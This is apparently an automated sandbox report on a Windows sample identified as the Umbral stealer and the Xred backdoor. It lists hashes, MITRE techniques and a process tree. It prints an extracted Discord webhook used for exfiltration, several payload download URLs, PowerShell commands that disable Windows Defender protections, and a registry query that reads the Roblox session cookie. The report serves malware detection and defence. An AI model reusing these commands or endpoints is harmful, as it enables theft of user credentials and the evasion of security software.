Analysis
-
max time kernel
144s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240708-en -
submitted
12-07-2024 22:35
Behavioral task
behavioral1
Sample
3O.exe
Resource
win7-20240708-en
General
-
Target
3O.exe
-
Size
972KB
-
MD5
e9e10384209bc3b39b6f5cd6f33314e7
-
SHA1
40f0bed19c2f77417ab130e7be434c6e0e33bc0a
-
SHA256
b63721f19f217379cbafdaa58a1a2d16975b82547a5cb8701604f53e5ace059b
-
SHA512
b391ef944dcc1d4f1158579ea4f7c8f248c5b3ee58f4483a2ba60956953763c6a0ce641707a583c6329e1c58265494065552901a0152cea5d6d87cd5d40501be
-
SSDEEP
24576:HnsJ39LyjbJkQFMhmC+6GD94I8AvqGELnszd42X3W6FY:HnsHyjtk2MYC5GDlFY
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1260639029204881480/iDveNlzEvkWz3nrGTBbCyvAJNF9-L44ep1CFuZ9ffhZ1uZM9fJhFC39LcEEWSQ9kHBqS
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
Detect Umbral payload 9 IoCs
resource yara_rule behavioral1/files/0x0004000000011ba2-4.dat family_umbral behavioral1/files/0x0008000000016c49-12.dat family_umbral behavioral1/memory/2756-25-0x0000000000400000-0x00000000004F9000-memory.dmp family_umbral behavioral1/memory/2680-28-0x0000000001290000-0x00000000012D0000-memory.dmp family_umbral behavioral1/memory/2660-36-0x0000000001390000-0x00000000013D0000-memory.dmp family_umbral behavioral1/memory/2564-102-0x0000000000400000-0x00000000004F9000-memory.dmp family_umbral behavioral1/memory/2564-103-0x0000000000400000-0x00000000004F9000-memory.dmp family_umbral behavioral1/memory/2564-127-0x0000000000400000-0x00000000004F9000-memory.dmp family_umbral behavioral1/memory/2564-138-0x0000000000400000-0x00000000004F9000-memory.dmp family_umbral -
Umbral family
-
Xred family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1000 powershell.exe 1764 powershell.exe 2152 powershell.exe 916 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts ._cache_Synaptics.exe -
Executes dropped EXE 3 IoCs
pid Process 2680 ._cache_3O.exe 2564 Synaptics.exe 2660 ._cache_Synaptics.exe -
Loads dropped DLL 5 IoCs
pid Process 2756 3O.exe 2756 3O.exe 2756 3O.exe 2564 Synaptics.exe 2564 Synaptics.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\????? = "C:\\ProgramData\\Synaptics\\Synaptics.exe" 3O.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 discord.com 8 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3O.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1848 cmd.exe 1948 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1732 wmic.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1948 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2028 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2660 ._cache_Synaptics.exe 1000 powershell.exe 1764 powershell.exe 2152 powershell.exe 1772 powershell.exe 916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2660 ._cache_Synaptics.exe Token: SeIncreaseQuotaPrivilege 2968 wmic.exe Token: SeSecurityPrivilege 2968 wmic.exe Token: SeTakeOwnershipPrivilege 2968 wmic.exe Token: SeLoadDriverPrivilege 2968 wmic.exe Token: SeSystemProfilePrivilege 2968 wmic.exe Token: SeSystemtimePrivilege 2968 wmic.exe Token: SeProfSingleProcessPrivilege 2968 wmic.exe Token: SeIncBasePriorityPrivilege 2968 wmic.exe Token: SeCreatePagefilePrivilege 2968 wmic.exe Token: SeBackupPrivilege 2968 wmic.exe Token: SeRestorePrivilege 2968 wmic.exe Token: SeShutdownPrivilege 2968 wmic.exe Token: SeDebugPrivilege 2968 wmic.exe Token: SeSystemEnvironmentPrivilege 2968 wmic.exe Token: SeRemoteShutdownPrivilege 2968 wmic.exe Token: SeUndockPrivilege 2968 wmic.exe Token: SeManageVolumePrivilege 2968 wmic.exe Token: 33 2968 wmic.exe Token: 34 2968 wmic.exe Token: 35 2968 wmic.exe Token: SeIncreaseQuotaPrivilege 2968 wmic.exe Token: SeSecurityPrivilege 2968 wmic.exe Token: SeTakeOwnershipPrivilege 2968 wmic.exe Token: SeLoadDriverPrivilege 2968 wmic.exe Token: SeSystemProfilePrivilege 2968 wmic.exe Token: SeSystemtimePrivilege 2968 wmic.exe Token: SeProfSingleProcessPrivilege 2968 wmic.exe Token: SeIncBasePriorityPrivilege 2968 wmic.exe Token: SeCreatePagefilePrivilege 2968 wmic.exe Token: SeBackupPrivilege 2968 wmic.exe Token: SeRestorePrivilege 2968 wmic.exe Token: SeShutdownPrivilege 2968 wmic.exe Token: SeDebugPrivilege 2968 wmic.exe Token: SeSystemEnvironmentPrivilege 2968 wmic.exe Token: SeRemoteShutdownPrivilege 2968 wmic.exe Token: SeUndockPrivilege 2968 wmic.exe Token: SeManageVolumePrivilege 2968 wmic.exe Token: 33 2968 wmic.exe Token: 34 2968 wmic.exe Token: 35 2968 wmic.exe Token: SeDebugPrivilege 1000 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeDebugPrivilege 1772 powershell.exe Token: SeIncreaseQuotaPrivilege 3008 wmic.exe Token: SeSecurityPrivilege 3008 wmic.exe Token: SeTakeOwnershipPrivilege 3008 wmic.exe Token: SeLoadDriverPrivilege 3008 wmic.exe Token: SeSystemProfilePrivilege 3008 wmic.exe Token: SeSystemtimePrivilege 3008 wmic.exe Token: SeProfSingleProcessPrivilege 3008 wmic.exe Token: SeIncBasePriorityPrivilege 3008 wmic.exe Token: SeCreatePagefilePrivilege 3008 wmic.exe Token: SeBackupPrivilege 3008 wmic.exe Token: SeRestorePrivilege 3008 wmic.exe Token: SeShutdownPrivilege 3008 wmic.exe Token: SeDebugPrivilege 3008 wmic.exe Token: SeSystemEnvironmentPrivilege 3008 wmic.exe Token: SeRemoteShutdownPrivilege 3008 wmic.exe Token: SeUndockPrivilege 3008 wmic.exe Token: SeManageVolumePrivilege 3008 wmic.exe Token: 33 3008 wmic.exe Token: 34 3008 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2028 EXCEL.EXE -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 2756 wrote to memory of 2680 2756 3O.exe 30 PID 2756 wrote to memory of 2680 2756 3O.exe 30 PID 2756 wrote to memory of 2680 2756 3O.exe 30 PID 2756 wrote to memory of 2680 2756 3O.exe 30 PID 2756 wrote to memory of 2564 2756 3O.exe 31 PID 2756 wrote to memory of 2564 2756 3O.exe 31 PID 2756 wrote to memory of 2564 2756 3O.exe 31 PID 2756 wrote to memory of 2564 2756 3O.exe 31 PID 2564 wrote to memory of 2660 2564 Synaptics.exe 32 PID 2564 wrote to memory of 2660 2564 Synaptics.exe 32 PID 2564 wrote to memory of 2660 2564 Synaptics.exe 32 PID 2564 wrote to memory of 2660 2564 Synaptics.exe 32 PID 2660 wrote to memory of 2968 2660 ._cache_Synaptics.exe 33 PID 2660 wrote to memory of 2968 2660 ._cache_Synaptics.exe 33 PID 2660 wrote to memory of 2968 2660 ._cache_Synaptics.exe 33 PID 2660 wrote to memory of 2436 2660 ._cache_Synaptics.exe 36 PID 2660 wrote to memory of 2436 2660 ._cache_Synaptics.exe 36 PID 2660 wrote to memory of 2436 2660 ._cache_Synaptics.exe 36 PID 2660 wrote to memory of 1000 2660 ._cache_Synaptics.exe 38 PID 2660 wrote to memory of 1000 2660 ._cache_Synaptics.exe 38 PID 2660 wrote to memory of 1000 2660 ._cache_Synaptics.exe 38 PID 2660 wrote to memory of 1764 2660 ._cache_Synaptics.exe 40 PID 2660 wrote to memory of 1764 2660 ._cache_Synaptics.exe 40 PID 2660 wrote to memory of 1764 2660 ._cache_Synaptics.exe 40 PID 2660 wrote to memory of 2152 2660 ._cache_Synaptics.exe 42 PID 2660 wrote to memory of 2152 2660 ._cache_Synaptics.exe 42 PID 2660 wrote to memory of 2152 2660 ._cache_Synaptics.exe 42 PID 2660 wrote to memory of 1772 2660 ._cache_Synaptics.exe 44 PID 2660 wrote to memory of 1772 2660 ._cache_Synaptics.exe 44 PID 2660 wrote to memory of 1772 2660 ._cache_Synaptics.exe 44 PID 2660 wrote to memory of 3008 2660 ._cache_Synaptics.exe 46 PID 2660 wrote to memory of 3008 2660 ._cache_Synaptics.exe 46 PID 2660 wrote to memory of 3008 2660 ._cache_Synaptics.exe 46 PID 2660 wrote to memory of 3052 2660 ._cache_Synaptics.exe 48 PID 2660 wrote to memory of 3052 2660 ._cache_Synaptics.exe 48 PID 2660 wrote to memory of 3052 2660 ._cache_Synaptics.exe 48 PID 2660 wrote to memory of 1620 2660 ._cache_Synaptics.exe 50 PID 2660 wrote to memory of 1620 2660 ._cache_Synaptics.exe 50 PID 2660 wrote to memory of 1620 2660 ._cache_Synaptics.exe 50 PID 2660 wrote to memory of 916 2660 ._cache_Synaptics.exe 52 PID 2660 wrote to memory of 916 2660 ._cache_Synaptics.exe 52 PID 2660 wrote to memory of 916 2660 ._cache_Synaptics.exe 52 PID 2660 wrote to memory of 1732 2660 ._cache_Synaptics.exe 54 PID 2660 wrote to memory of 1732 2660 ._cache_Synaptics.exe 54 PID 2660 wrote to memory of 1732 2660 ._cache_Synaptics.exe 54 PID 2660 wrote to memory of 1848 2660 ._cache_Synaptics.exe 56 PID 2660 wrote to memory of 1848 2660 ._cache_Synaptics.exe 56 PID 2660 wrote to memory of 1848 2660 ._cache_Synaptics.exe 56 PID 1848 wrote to memory of 1948 1848 cmd.exe 58 PID 1848 wrote to memory of 1948 1848 cmd.exe 58 PID 1848 wrote to memory of 1948 1848 cmd.exe 58 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2436 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3O.exe"C:\Users\Admin\AppData\Local\Temp\3O.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\._cache_3O.exe"C:\Users\Admin\AppData\Local\Temp\._cache_3O.exe"2⤵
- Executes dropped EXE
PID:2680
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"4⤵
- Views/modifies file attributes
PID:2436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:3052
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:1620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:916
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:1732
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" && pause4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\PING.EXEping localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1948
-
-
-
-
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2028
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
972KB
MD5e9e10384209bc3b39b6f5cd6f33314e7
SHA140f0bed19c2f77417ab130e7be434c6e0e33bc0a
SHA256b63721f19f217379cbafdaa58a1a2d16975b82547a5cb8701604f53e5ace059b
SHA512b391ef944dcc1d4f1158579ea4f7c8f248c5b3ee58f4483a2ba60956953763c6a0ce641707a583c6329e1c58265494065552901a0152cea5d6d87cd5d40501be
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cc2ebe0a534679db98b5935fa5795e45
SHA1c625a97e16eac8cd4b3782d6a3d5ccbcf9eb8817
SHA2565dc00048db4da89a80c8d6518779680e9f655553d1e32b86f965d180cb5f7d95
SHA51298a120d4fcaa06a24d011c2d4cee3141eb21698ac9579362f2e49388fda0314c60184580d72451c00b9fc0fb60e837fb15a3adc35dc556775abe22c8394c62c9
-
Filesize
227KB
MD5564b355897ddc57a49b9c0385673b7c4
SHA1830b0bd8d603c384a3ca59de5889c9ccb98233b1
SHA256ccf452b1c9ef7ad173d702e74cb17c13bee478432ed764259d4b33634aea438c
SHA512c2ebcea2723156c3534641b796a0303fedc06e4ba304e285d898ad819fa4eac4cac0bda79831d60097db4a7a0c76a8af616ff0c5ecbb327200724810523a12a5